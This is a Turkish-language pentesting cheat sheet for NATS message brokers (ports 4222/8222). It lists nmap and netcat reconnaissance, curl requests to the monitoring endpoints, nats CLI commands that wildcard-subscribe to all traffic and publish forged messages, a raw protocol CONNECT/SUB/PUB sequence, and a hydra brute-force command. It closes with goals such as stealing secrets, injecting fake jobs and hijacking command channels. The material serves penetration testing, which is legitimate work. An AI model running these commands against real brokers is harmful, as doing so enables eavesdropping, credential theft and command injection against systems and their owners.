Skip to content

4222 - Pentesting NATS

network messaging

NATS (4222/tcp, monitoring 8222) mesaj kuyruğudur. Auth kapalıysa tüm subject’lere pub/sub ile veri sızıntısı ve komut enjeksiyonu mümkündür.

  1. 4222 ve 8222 monitoring portlarını doğrula.

  2. Anonim bağlantı ve INFO banner al.

  3. Subject wildcard subscribe ile trafik dinle.

  4. Kritik subject’e sahte mesaj publish et.

Terminal window
nmap -Pn -sV -p4222,8222,6222 TARGET
Terminal window
nc -nv TARGET 4222
Terminal window
curl -sk http://TARGET:8222/varz
Terminal window
curl -sk http://TARGET:8222/connz
Terminal window
curl -sk http://TARGET:8222/subsz
Terminal window
nats server check connection --server nats://TARGET:4222
Terminal window
nats sub '>' --server nats://TARGET:4222
Terminal window
nats pub demo.hi 'pwn' --server nats://TARGET:4222
Terminal window
# auth varsa:
nats sub '>' --server nats://user:pass@TARGET:4222
CONNECT {"verbose":false,"pedantic":false,"tls_required":false,"name":"pentest","lang":"go","version":"1.0"}
SUB > 1
PUB test 3
pwn
Terminal window
hydra -L users.txt -P rockyou.txt nats://TARGET
Monitoring /varz içinde auth timeout ve connection ip'leri sızabilir
- Credential/token subject'lerinden secret yakalama
- Worker'lara sahte job publish
- Service mesh komut kanalını hijack
[ ] 4222/8222 açık
[ ] Anonim sub/pub
[ ] Wildcard dinleme ile secret
[ ] Sahte publish etkisi